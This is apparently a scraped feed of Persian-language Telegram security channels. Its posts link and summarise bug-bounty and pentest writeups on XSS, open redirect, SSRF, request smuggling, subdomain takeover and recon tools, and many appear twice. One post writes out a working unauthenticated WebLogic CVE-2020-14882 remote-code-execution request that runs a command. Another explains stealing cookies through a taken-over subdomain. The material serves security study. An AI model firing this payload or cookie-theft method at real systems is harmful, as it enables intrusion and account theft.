Forwarded from امنیت اطلاعات
آسیب پذیری عجیب Tiki Wiki Cms Groupware
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@sec_nerd
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@sec_nerd
Forwarded from digMeMore (r00t98)
مجبور کردن فایرفاکس به اجرای XSS در ریدایرکت های 302
https://www.gremwell.com/firefox-xss-302
#XSS
#OpenRedirect
#BugBountyTip
@web_priv8
https://www.gremwell.com/firefox-xss-302
#XSS
#OpenRedirect
#BugBountyTip
@web_priv8
کارهای خفنی که با Open Redirect میشه انجام داد.
https://blog.detectify.com/2019/05/16/the-real-impact-of-an-open-redirect/
#OpenRedirect
#BugBountyTip
@web_priv8
https://blog.detectify.com/2019/05/16/the-real-impact-of-an-open-redirect/
#OpenRedirect
#BugBountyTip
@web_priv8
Blog Detectify
The real impact of an Open Redirect vulnerability - Blog Detectify
This article shows when open redirect is considered harmful, it's impact, and how it could lead to attacks like SSRF.
Forwarded from امنیت اطلاعات
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت
CVE-2020–14882
http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd
بدون نیاز به احراز هویت
CVE-2020–14882
http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd
افزایش سطح دسترسی با تغییر ریسپانس.
https://amiyabehera03.medium.com/a-short-story-of-vertical-privilege-escalation-admin-account-takeover-c943c1711f62
#PrivEsc
#BugBounty
@web_priv8
https://amiyabehera03.medium.com/a-short-story-of-vertical-privilege-escalation-admin-account-takeover-c943c1711f62
#PrivEsc
#BugBounty
@web_priv8
Medium
A Short Story of Vertical Privilege Escalation (Admin Account Takeover)
Hello Guys, Hope all of you are doing well. I am Amiya Behera, an Information Security Analyst in a private organization . also a…
Subdomain Takeover to Authentication bypass
یکی از تٲثیر های تصاحبِ زیردامنه یا Subdomain Takeover مربوط به دزدیدن کوکی های دامین اصلی میشه، برای مثال کوکی های
1- با زبان سمت سرور کوکی رو بگیره، مثلا فایل PHP اپلود کنه رو زیردامنه تصاحب شده.
2- با جاوااسکریپت کوکی رو بگیره، اینجاهم مثل اپلود HTML و بقیه موارد.
مزیت مورد اول نسبت به مورد دوم این هست که دیگه فلگِ HttpOnly اینجا معنی نمیده و هکر حتی با وجود فلگِ HttpOnly میتونه کوکی رو بگیره.
این گزارش دقیقا مثل مورد اوله و یه POC دیگه برا اکسپلویت CORS هم معرفی کرده.
#ATO
#BugBounty
#SubdomainTakeover
@web_priv8
یکی از تٲثیر های تصاحبِ زیردامنه یا Subdomain Takeover مربوط به دزدیدن کوکی های دامین اصلی میشه، برای مثال کوکی های
x.com به دامنه تصاحب شده مثل z.x.com ارسال میشن(طبق RFC 6265)، حالا اینجا POC چیه؟ سادس، هکر برا گرفتن کوکی دوتا راه داره:1- با زبان سمت سرور کوکی رو بگیره، مثلا فایل PHP اپلود کنه رو زیردامنه تصاحب شده.
2- با جاوااسکریپت کوکی رو بگیره، اینجاهم مثل اپلود HTML و بقیه موارد.
مزیت مورد اول نسبت به مورد دوم این هست که دیگه فلگِ HttpOnly اینجا معنی نمیده و هکر حتی با وجود فلگِ HttpOnly میتونه کوکی رو بگیره.
این گزارش دقیقا مثل مورد اوله و یه POC دیگه برا اکسپلویت CORS هم معرفی کرده.
#ATO
#BugBounty
#SubdomainTakeover
@web_priv8
Forwarded from digMeMore (Yasho)
مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
باگ ۱۵ میلیون تومانیِ تصاحب حساب کاربری در وباپلیکیشن کافهبازار - مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
مقدمه من و یاشار شاهینزاده در راستای برنامهی باگبانتی کافهبازار آسیبپذیریهای امنیتی مختلفی را شناسایی کردیم. در یکی از آسیبپذیریها، وجود یک مشکل رمزنگاری به دور زدن فرایند احراز هویت (Authentication bypass) در وباپلیکیشن کافهبازار منجر میشد. آسیبپذیری…
31k$ SSRF in Google Cloud Monitoring led to metadata exposure
https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html
#SSRF
#BugBounty
@web_priv8
https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html
#SSRF
#BugBounty
@web_priv8
Blogspot
31k$ SSRF in Google Cloud Monitoring led to metadata exposure
Update 25.01.2021: Added Google engineers exploit method for getting access token. Google Cloud Monitoring (formerly called Stackdriver)...
دیدید بعضی وقت ها یسری XSS هایی که میگیرید قابل اکسپلویت نیست؟ مثل XSS از طریق هدرِ User-Agent یا هدرِ دیگه ای، اینجا محقق یه آسیب پذیری Request Smuggling گرفته و اومده اونو با یه XSS که از طریق هدر اتفاق میفتاده رو ترکیب و اکسپلویت کرده.
https://www.rcesecurity.com/2020/11/Smuggling-an-un-exploitable-xss/
#XSS
#Smuggling
#BugBounty
@web_priv8
https://www.rcesecurity.com/2020/11/Smuggling-an-un-exploitable-xss/
#XSS
#Smuggling
#BugBounty
@web_priv8
Forwarded from digMeMore (Yasho)
مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
کدنویسی امن از کجا شروع میشود؟ - مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
مهم نیست که توسعهدهنده چه زبانی هستید و با چه تکنولوژی ای مشغول به کارید ! نقش این ویدئو، گذاشتن عینک امنیتی بر چشمان همهی توسعهدهنده هایی که دوست دارن نرم افزارایی که تولید میکنن در بهترین سطوح امنیت باشه و قراره دروازهای باشه تا اونها رو به دالان پر…
Bypassing the Redirect filters with 7 ways
https://elmahdi.tistory.com/m/4
#Bypass
#OpenRedirect
#BugBountyTip
@web_priv8
https://elmahdi.tistory.com/m/4
#Bypass
#OpenRedirect
#BugBountyTip
@web_priv8
ElMahdi - マハディ
Bypassing the Redirect filters with 7 ways
Hello Bug Bounty Hunters, In this writeup I will be explaining various scenarios on how to bypass Open Redirect Filters that will lead to Open Redirect> ATO [0x01] Bypass the OAUTH Protection Via Path-URI Open redirect: I already reported a report about simple…
VPS Setup for Bug Bounty Recon Automation
https://link.medium.com/XtOM7vwMIbb
#Recon
#BugBounty
#BugBountyTip
@web_priv8
https://link.medium.com/XtOM7vwMIbb
#Recon
#BugBounty
#BugBountyTip
@web_priv8
Medium
Beginners Guide: VPS Setup for Bug Bounty Recon Automation
Hello, All. My name is Ranjan. I am a final year CS undergrad and a part-time bug bounty hunter. Due to college, I don’t get enough time…
Forwarded from digMeMore (Yasho)
مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
روش کشف XSS در برنامه بانتی خارجی - مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
سلام عماد هستم، این اولین نوشتار من برای مموری لیکز هست، تو این نوشتار میخواهیم یک بررسی بر روی فرآیند Automate کردن XSS داشته باشیم که بتونیم تو کمترین زمان ممکن به نتیجه برسیم. داستان از کشف آسیبپذیری Reflected DOM XSS توی یکی از برنامههای باگبانتی خارجی…
Sub-Drill
A very (very) simple subdomain finder based on online, free and API-less services.
https://github.com/Fadavvi/Sub-Drill
#Tool
#Recon
#Subdomain
@web_priv8
A very (very) simple subdomain finder based on online, free and API-less services.
https://github.com/Fadavvi/Sub-Drill
#Tool
#Recon
#Subdomain
@web_priv8
GitHub
GitHub - Fadavvi/Sub-Drill: A very (very) FAST and simple subdomain finder based on online & free services. Without any configuration…
A very (very) FAST and simple subdomain finder based on online & free services. Without any configuration requirements. - GitHub - Fadavvi/Sub-Drill: A very (very) FAST and simple subdomai...